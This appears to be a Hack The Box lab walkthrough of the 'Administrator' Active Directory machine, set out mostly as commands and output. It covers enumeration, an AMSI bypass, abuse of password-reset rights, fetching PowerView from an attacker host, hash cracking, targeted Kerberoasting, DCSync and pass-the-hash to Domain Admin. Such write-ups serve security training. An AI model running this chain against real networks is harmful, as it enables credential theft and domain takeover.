Administrator

Join The Best Hacking Community Worldwide | Hack The Box

Over half a million platform members exhange ideas and methodologies. Be one of us and help the community grow even further!

www.hackthebox.com

Nmap

ports=$(nmap -p- --min-rate=1000 -T4 10.129.235.118 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.129.235.118 -v -oN nmap_tcp_all

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-09-02 14:10:57Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
54055/tcp open  msrpc         Microsoft Windows RPC
54060/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
54073/tcp open  msrpc         Microsoft Windows RPC
54076/tcp open  msrpc         Microsoft Windows RPC
54079/tcp open  msrpc         Microsoft Windows RPC
54095/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-09-02T14:12:08
|_  start_date: N/A
|_clock-skew: 7h00m44s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

The initial Nmap scan reveals a range of open ports. Notably, SMB is running on port 445, LDAP on port 389, and Kerberos on port 88, which strongly suggests the host is part of an Active Directory environment. We also see FTP listening on port 21. From the Nmap results we obtain the domain name administrator.htb, which we then add to the /etc/hosts file to make it easier to reference throughout the engagement.

echo "10.129.235.118 administrator.htb" | sudo tee -a /etc/hosts

FTP

Using the supplied credentials Olivia:ichliebedich, we attempt to log in to the FTP service. However, the authentication fails and access is denied.

┌──(kali㉿kali)-[~/Administrator]
└─$ ftp 10.129.235.118
Connected to 10.129.235.118.
220 Microsoft FTP Service
Name (10.129.235.118:kali): Olivia
331 Password required
Password: #ichliebedich
530 User cannot log in, home directory inaccessible.
ftp: Login failed
ftp>

DNS

To investigate the DNS service, we use the dig command to query the target directly. The first query with +short shows that the hostname administrator.htb resolves to two IP addresses: 10.129.235.118 and 10.10.11.42.

Running the full dig command confirms this, showing both addresses in the ANSWER SECTION. This indicates that the DNS server is configured with multiple A records for the same domain, meaning the hostname resolves to more than one IP. This is often used for redundancy or load balancing, but in a lab environment it usually suggests the host is reachable through different network ranges.

By confirming these records, we know that traffic to administrator.htb may be routed to either of these IP addresses depending on how we connect.

┌──(kali㉿kali)-[~/Administrator]
└─$ dig +short @10.129.235.118 administrator.htb
10.129.235.118
10.10.11.42

┌──(kali㉿kali)-[~/Administrator]
└─$ dig @10.129.235.118 administrator.htb

; <<>> DiG 9.20.11-4+b1-Debian <<>> @10.129.235.118 administrator.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 47315
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;administrator.htb.             IN      A

;; ANSWER SECTION:
administrator.htb.      600     IN      A       10.10.11.42
administrator.htb.      600     IN      A       10.129.235.118

;; Query time: 323 msec
;; SERVER: 10.129.235.118#53(10.129.235.118) (UDP)
;; WHEN: Tue Sep 02 19:19:53 NZST 2025
;; MSG SIZE  rcvd: 78

LDAP - Active Directory Enumeration

LDAP (Lightweight Directory Access Protocol) is used in Windows environments to manage users, groups, and more. We use windapsearch to search for domain info:

┌──(windap)─(kali㉿kali)-[~/Tools/windapsearch]
└─$ ./windapsearch.py -d administrator.htb --dc-ip 10.129.235.118 -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.235.118
[+] Getting defaultNamingContext from Root DSE
[+]     Found: DC=administrator,DC=htb
[+] Attempting bind
[+]     ...success! Binded as:
[+]      None

[+] Enumerating all AD users
[!] Error retrieving users
[!] {'msgtype': 101, 'msgid': 3, 'result': 1, 'desc': 'Operations error', 'ctrls': [], 'info': '000004DC: LdapErr: DSID-0C090C78, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c'}

┌──(windap)─(kali㉿kali)-[~/Tools/windapsearch]
└─$ ./windapsearch.py -d administrator.htb --dc-ip 10.129.235.118 --custom "objectClass=*"
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.235.118
[+] Getting defaultNamingContext from Root DSE
[+]     Found: DC=administrator,DC=htb
[+] Attempting bind
[+]     ...success! Binded as:
[+]      None
[+] Performing custom lookup with filter: "objectClass=*"
[!] Error retrieving results with custom filter
[!] {'msgtype': 101, 'msgid': 3, 'result': 1, 'desc': 'Operations error', 'ctrls': [], 'info': '000004DC: LdapErr: DSID-0C090C78, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c'}

SMB

Using the provided credentials, we attempt to enumerate the available SMB shares. The connection is successful, but the listed shares do not contain anything of immediate interest for further exploitation.

┌──(kali㉿kali)-[~/Administrator]
└─$ nxc smb 10.129.235.118 -u Olivia -p ichliebedich --shares
SMB         10.129.235.118  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.235.118  445    DC               [+] administrator.htb\Olivia:ichliebedich
SMB         10.129.235.118  445    DC               [*] Enumerated shares
SMB         10.129.235.118  445    DC               Share           Permissions     Remark
SMB         10.129.235.118  445    DC               -----           -----------     ------
SMB         10.129.235.118  445    DC               ADMIN$                          Remote Admin
SMB         10.129.235.118  445    DC               C$                              Default share
SMB         10.129.235.118  445    DC               IPC$            READ            Remote IPC
SMB         10.129.235.118  445    DC               NETLOGON        READ            Logon server share
SMB         10.129.235.118  445    DC               SYSVOL          READ            Logon server share

RPC

Next, we check whether the target allows access to the Remote Procedure Call (RPC) service, which often exposes useful information about the domain. We try to connect with a null session (-U "" -N), meaning no username or password is supplied.

Once connected, we attempt some common enumeration commands. Running querydominfo returns NT_STATUS_ACCESS_DENIED, showing that we don’t have the necessary rights to retrieve domain details. We also try enumdomuser, but this isn’t recognised as a valid command (the correct command would be enumdomusers).

At this stage, our null session doesn’t provide any useful information.

┌──(kali㉿kali)-[~/Administrator]
└─$ rpcclient -U "" -N 10.129.235.118
rpcclient $> querydominfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomuser
command not found: enumdomuser
rpcclient $>

WinRM

Using the supplied credentials, we successfully connect to the Domain Controller through Evil-WinRM. This gives us an interactive shell on the target, allowing us to run commands directly on the system.

┌──(kali㉿kali)-[~/Administrator]
└─$ nxc winrm 10.129.235.118 -u Olivia -p ichliebedich
WINRM       10.129.235.118  5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM       10.129.235.118  5985   DC               [+] administrator.htb\Olivia:ichliebedich (Pwn3d!)

┌──(kali㉿kali)-[~/Administrator]
└─$ evil-winrm -i 10.129.235.118 -u olivia -p ichliebedich
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\olivia\Documents>

Bloodhound

With the valid credentials, we proceed to enumerate the Domain Controller using BloodHound. For this step we run bloodhound.py, a Python-based ingestor that gathers information from the domain such as users, groups, sessions, and permissions. The collected data is then exported into BloodHound’s database, where it can be visualised and analysed to identify potential attack paths.

┌──(kali㉿kali)-[~/Administrator]
└─$ sudo bloodhound-python -u 'Olivia' -p 'ichliebedich' -ns 10.129.235.118 -d administrator.htb -c all
[sudo] password for kali:
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.administrator.htb:88)] [Errno -3] Temporary failure in name resolution
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
WARNING: DCE/RPC connection failed: [Errno Connection error (10.129.235.118:445)] timed out
INFO: Done in 01M 44S

After the data collection finishes, we compress the generated JSON files into a ZIP archive. Next, we start the Neo4j service (which BloodHound relies on as its database backend) and then launch BloodHound itself. Finally, we upload the ZIP archive into BloodHound, allowing the tool to parse and display the domain relationships in its graphical interface.

┌──(kali㉿kali)-[~/Administrator]
└─$ zip administrator.zip -r *.json
  adding: 20250902193733_computers.json (deflated 75%)
  adding: 20250902193733_containers.json (deflated 93%)
  adding: 20250902193733_domains.json (deflated 79%)
  adding: 20250902193733_gpos.json (deflated 85%)
  adding: 20250902193733_groups.json (deflated 94%)
  adding: 20250902193733_ous.json (deflated 69%)
  adding: 20250902193733_users.json (deflated 94%)

In BloodHound, we set the Olivia user as our starting node. After selecting the node and scrolling down to the Outbound Object Control section, we see that Olivia has GenericAll permissions over the user Michael. This means Olivia effectively has full control over Michael’s account, allowing us to perform actions such as resetting their password.

Foothold

Because Olivia has GenericAll rights over Michael, we have full control of that account. In practice, this means we can reset Michael’s password or carry out other administrative actions on the object. Further details about GenericAll and other permission types are available in the official BloodHound documentation.

Within our Evil-WinRM session, we proceed to bypass AMSI (Antimalware Scan Interface). This step is often necessary because AMSI inspects and blocks potentially malicious scripts before they execute. By applying a bypass, we can run PowerShell payloads and enumeration scripts without being intercepted by the built-in Windows security controls.

*Evil-WinRM* PS C:\Users\olivia\Documents> Bypass-4MSI
                                        
Info: Patching 4MSI, please be patient...
                                        
[+] Success!
                                        
Info: Patching ETW, please be patient ..
                                        
[+] Success!

Following the guidance from BloodHound, we move ahead with a force password change on the user Michael. Since Olivia has GenericAll rights, this action is permitted and allows us to reset Michael’s password without needing to know the original one.

*Evil-WinRM* PS C:\Users\olivia\Documents> $SecPassword = ConvertTo-SecureString 'ichliebedich' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\olivia\Documents> $Cred = New-Object System.Management.Automation.PSCredential('administrator.htb\olivia', $SecPassword)

Next, we create a secure string object in PowerShell for the new password we intend to set on the target user.

*Evil-WinRM* PS C:\Users\olivia\Documents> $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

We then upload PowerView to the target and import it into our PowerShell session. Using the Set-DomainUserPassword function, we reset Michael’s password. If required, we can also supply the $Cred object to explicitly authenticate as Olivia when performing this action.

*Evil-WinRM* PS C:\Users\olivia\Documents> iwr -uri http://10.10.16.141/PowerView.ps1 -Outfile PowerView.ps1
*Evil-WinRM* PS C:\Users\olivia\Documents> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\olivia\Documents> Set-DomainUserPassword -Identity michael -AccountPassword $UserPassword -Credential $Cred

To confirm that the password reset was successful, we test the new credentials against the Domain Controller using NetExec (nxc). This helps verify that Michael’s account is accessible with the password we’ve set.

┌──(kali㉿kali)-[~/Administrator]
└─$ nxc winrm 10.129.235.118 -u michael -p 'Password123!'    
WINRM       10.129.235.118  5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM       10.129.235.118  5985   DC               [+] administrator.htb\michael:Password123! (Pwn3d!)

Lateral Movement

With the new credentials confirmed, we use Evil-WinRM to establish a session as the user Michael.

┌──(kali㉿kali)-[~/Administrator]
└─$ evil-winrm -i 10.129.235.118 -u michael -p 'Password123!'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\michael\Documents>

Returning to BloodHound, we observe that Michael has the ability to ForceChangePassword on the user Benjamin. This means Michael can reset Benjamin’s password without knowing the existing one, giving us control over Benjamin’s account in much the same way we previously took control of Michael’s.

We now repeat the same process to reset Benjamin’s password. Since Michael has the ForceChangePassword right over Benjamin, we can set a new password of our choice and then use it to log in as Benjamin.

*Evil-WinRM* PS C:\Users> Bypass-4MSI
                                        
Info: Patching 4MSI, please be patient...
                                        
[+] Success!
                                        
Info: Patching ETW, please be patient ..
                                        
[+] Success!
*Evil-WinRM* PS C:\Users> cd michael
*Evil-WinRM* PS C:\Users\michael> $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\michael> $Cred = New-Object System.Management.Automation.PSCredential('administrator.htb\michael', $SecPassword)
*Evil-WinRM* PS C:\Users\michael> $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\michael> iwr -uri http://10.10.16.141/PowerView.ps1 -Outfile PowerView.ps1
*Evil-WinRM* PS C:\Users\michael> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\michael> Set-DomainUserPassword -Identity benjamin -AccountPassword $UserPassword -Credential $Cred

After resetting Benjamin’s password, we verify the new credentials using NetExec (nxc) against the Domain Controller.

┌──(kali㉿kali)-[~/Administrator]
└─$ nxc smb 10.129.235.118 -u benjamin -p 'Password123!'     
SMB         10.129.235.118  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False) 
SMB         10.129.235.118  445    DC               [+] administrator.htb\benjamin:Password123!

On Bloodhound, we find that Benjamin is a member of the Share Moderators group. However, the purpose and privileges of this group are not immediately clear, so further investigation is required to understand what level of access it provides.

We also confirm that Benjamin’s credentials work with the FTP service we identified during our initial enumeration. This gives us another access point into the system and may allow us to discover files or misconfigurations that were not accessible earlier.

┌──(kali㉿kali)-[~/Administrator]
└─$ nxc ftp 10.129.235.118 -u benjamin -p 'Password123!' 
FTP         10.129.235.118  21     10.129.235.118   [+] benjamin:Password123!

FTP

Using Benjamin’s credentials, we successfully log into the FTP service. While browsing the available files, we discover a Backup.psafe3 file. This file format belongs to the Password Safe application, which securely stores passwords and other sensitive information using encryption. We download the file to our local machine for further analysis.

┌──(kali㉿kali)-[~/Administrator]
└─$ ftp 10.129.235.118
Connected to 10.129.235.118.
220 Microsoft FTP Service
Name (10.129.235.118:kali): benjamin
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||51321|)
125 Data connection already open; Transfer starting.
10-05-24  09:13AM                  952 Backup.psafe3
226 Transfer complete.
ftp> mget Backup.psafe3
mget Backup.psafe3 [anpqy?]? y
229 Entering Extended Passive Mode (|||51325|)
125 Data connection already open; Transfer starting.
100% |************************************************************************************************************************************************|   952        1.43 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (0.95 KiB/s)

To open the .psafe3 file, we need to install the Password Safe application on a Windows machine. However, access to the stored credentials also requires the Master Password, without which the database cannot be unlocked.

We can use the pwsafe2john utility to extract a hash from the .psafe3 file. Once we have the hash, we run it through John the Ripper to attempt to crack the Master Password. If successful, this will allow us to unlock the Password Safe database and access the stored credentials.

┌──(kali㉿kali)-[~/Administrator]
└─$ pwsafe2john Backup.psafe3 
Backu:$pwsafe$*3*4ff5<SNIP>4050

┌──(kali㉿kali)-[~/Administrator]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt backup_psafe3_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
t<SNIP>o     (Backu)     
1g 0:00:00:00 DONE (2025-09-02 20:32) 2.222g/s 11377p/s 11377c/s 11377C/s newzealand..babygrl
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

John the Ripper successfully cracks the hash, revealing the Master Password for the Password Safe database. With this, we unlock the .psafe3 file and gain access to the stored entries, which include accounts for Alexander, Emily, and Emma.

Within the Password Safe application, we can retrieve each saved password by right-clicking on the corresponding user entry and selecting Copy Password to Clipboard.

From the unlocked Password Safe database, we extract the following credentials:

alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily:U<SNIP>b
emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur

We first validate the extracted credentials using NetExec (nxc). After testing each account, we confirm a successful login with Emily’s credentials. We then update our credentials file to keep track of the working account details.

┌──(kali㉿kali)-[~/Administrator]
└─$ nxc smb 10.129.235.118 -u emily -p U<SNIP>b
SMB         10.129.235.118  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False) 
SMB         10.129.235.118  445    DC               [+] administrator.htb\emily:UXLCI5iETU<SNIP>b 

┌──(kali㉿kali)-[~/Administrator]
└─$ nxc winrm 10.129.235.118 -u emily -p U<SNIP>b
WINRM       10.129.235.118  5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM       10.129.235.118  5985   DC               [+] administrator.htb\emily:UXLCI5iETU<SNIP>b (Pwn3d!)

At this stage, our credentials file has been updated to include all the accounts we have discovered and validated so far. It looks like this:

olivia:ichliebedich
michael:Password123!
benjamin:Password123!
Backu:t<SNIP>o
emily:U<SNIP>b

Next, we use Evil-WinRM with Emily’s credentials to connect to the Domain Controller.

┌──(kali㉿kali)-[~/Administrator]
└─$ evil-winrm -i 10.129.235.118 -u emily -p U<SNIP>b
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents>

After gaining access as Emily, we navigate to her desktop directory:

C:\Users\emily\Desktop

Here we find the user flag, marking the completion of the first stage of the box.

Privilege Escalation

Looking back at BloodHound, we see that Emily has GenericWrite permissions over the user Ethan. This level of access allows Emily to modify certain attributes of Ethan’s account, which we may be able to abuse to gain control of it.

At this point, we can perform a targeted Kerberoast attack against Ethan. However, if our system clock is not aligned with the Domain Controller, we may encounter the error “Clock skew too great”. To fix this, we synchronise our Linux machine’s time with the Domain Controller using the ntpdate command.

┌──(kali㉿kali)-[~/Administrator/targetedKerberoast]
└─$ sudo ntpdate -u administrator.htb
[sudo] password for kali: 
2025-09-03 04:14:09.489233 (+1200) +25245.302504 +/- 0.242643 administrator.htb 10.129.235.118 s1 no-leap
CLOCK: time stepped by 25245.302504                                                                                                                                                                                             
┌──(kali㉿kali)-[~/Administrator/targetedKerberoast]
└─$ ./targetedKerberoast.py -d administrator.htb -u emily -p U<SNIP>b -v 
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$200c654490aefb8fd1985b0fc09<SNIP>f1791f2fa6965f6e9e4143864c53283a936976f26a51

After running the targeted Kerberoast attack, we successfully obtain a Kerberos service ticket for the user Ethan. We then extract the hash from the ticket and use John the Ripper to crack it. This reveals Ethan’s clear-text password, giving us valid credentials for his account.

┌──(kali㉿kali)-[~/Administrator]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt ethan_tgs     
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
l<SNIP>t       (?)     
1g 0:00:00:00 DONE (2025-09-03 04:16) 100.0g/s 512000p/s 512000c/s 512000C/s Liverpool..babygrl
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Alternatively we can use hashcat by running:

hashcat -a 0 -m 13100 ethan_tgs /usr/share/wordlists/rockyou.txt

We can validate Ethan’s cracked credentials by running NetExec (nxc) against the Domain Controller, for example:

┌──(kali㉿kali)-[~/Administrator]
└─$ nxc smb 10.129.235.118 -u ethan -p l<SNIP>t
SMB         10.129.235.118  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False) 
SMB         10.129.235.118  445    DC               [+] administrator.htb\ethan:l<SNIP>t

Reviewing the BloodHound results, we see that Ethan has the necessary rights to perform a DCSync attack. This technique allows us to impersonate a Domain Controller and request NTLM password hashes for domain accounts, including highly privileged users such as Domain Admins.

We carry out the DCSync attack using secretsdump.py from the Impacket toolkit, authenticating with Ethan’s credentials. This tool queries the Domain Controller and dumps the NTLM password hashes for domain users, including privileged accounts.

┌──(kali㉿kali)-[~/Administrator]
└─$ secretsdump.py administrator.htb/ethan@10.129.235.118 -just-dc
Impacket v0.13.0.dev0+20250314.172046.8b4566b1 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc5<SNIP>fd2e:::

Alternatively, if we only want to extract the Administrator’s NTLM hash, we can specify the account directly when running secretsdump.py. For example:

┌──(kali㉿kali)-[~/Administrator]
└─$ secretsdump.py administrator.htb/ethan@10.129.235.118 -just-dc-user Administrator
Impacket v0.13.0.dev0+20250314.172046.8b4566b1 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc5<SNIP>fd2e:::
<SNIP>

With the Administrator’s NTLM hash obtained, we can now use Evil-WinRM to access the Domain Controller. Instead of supplying a clear-text password, we authenticate with the hash using pass-the-hash functionality, which grants us an interactive shell as the Domain Administrator.

┌──(kali㉿kali)-[~/Administrator]
└─$ evil-winrm -i 10.129.235.118 -u Administrator -H 3dc5<SNIP>fd2e
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Finally, with Administrator-level access, we navigate to:

C:\Users\Administrator\Desktop

Here we find the root flag, marking full compromise of the machine.

References

HTB Official Walkthrough for Administrator
https://github.com/ShutdownRepo/targetedKerberoast